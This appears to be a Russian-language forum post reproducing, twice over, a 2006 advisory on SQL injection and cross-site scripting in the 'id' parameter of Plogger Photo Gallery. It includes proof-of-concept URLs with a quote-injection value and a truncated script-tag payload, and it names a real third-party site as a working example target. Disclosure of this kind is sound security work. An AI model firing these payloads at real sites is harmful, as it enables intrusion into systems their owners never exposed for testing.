Sql-инъекция и межсайтовый скриптинг в Plogger
вот свежие баги наковырял:
Sql-инъекция и межсайтовый скриптинг в Plogger Photo Gallery
Software: Plogger Photo Gallery > = 2.1
Vendor: Plogger www.plogger.org
Vulnerability: Sql-инъекция и межсайтовый скриптинг
Risk: средний
Date: 10.01.2006
discovered by durito -durito[at]mail[dot]ru-
HTTP: durito.narod.ru
+~~~:| Details |:
Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" . Удаленный пользователь может с помощью специально сформированного запроса выполнить Sql-инъекция и произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Межсайтовый скриптинг:
http://www.xxx.com/gallery/index.php?level...);%3C/script%3E
Sql-инъекция:
http://www.xxx.com/gallery/index.php?level=album&id='1
Примеры:
http://www.mahyuni.com/gallery/index.php?l...album&id='1
http://www.mahyuni.com/gallery/index.php?l...);%3C/script%3E
вот свежие баги наковырял:
Sql-инъекция и межсайтовый скриптинг в Plogger Photo Gallery
Software: Plogger Photo Gallery > = 2.1
Vendor: Plogger www.plogger.org
Vulnerability: Sql-инъекция и межсайтовый скриптинг
Risk: средний
Date: 10.01.2006
discovered by durito -durito[at]mail[dot]ru-
HTTP: durito.narod.ru
+~~~:| Details |:
Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" . Удаленный пользователь может с помощью специально сформированного запроса выполнить Sql-инъекция и произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Межсайтовый скриптинг:
http://www.xxx.com/gallery/index.php?level...);%3C/script%3E
Sql-инъекция:
http://www.xxx.com/gallery/index.php?level=album&id='1
Примеры:
http://www.mahyuni.com/gallery/index.php?l...album&id='1
http://www.mahyuni.com/gallery/index.php?l...);%3C/script%3E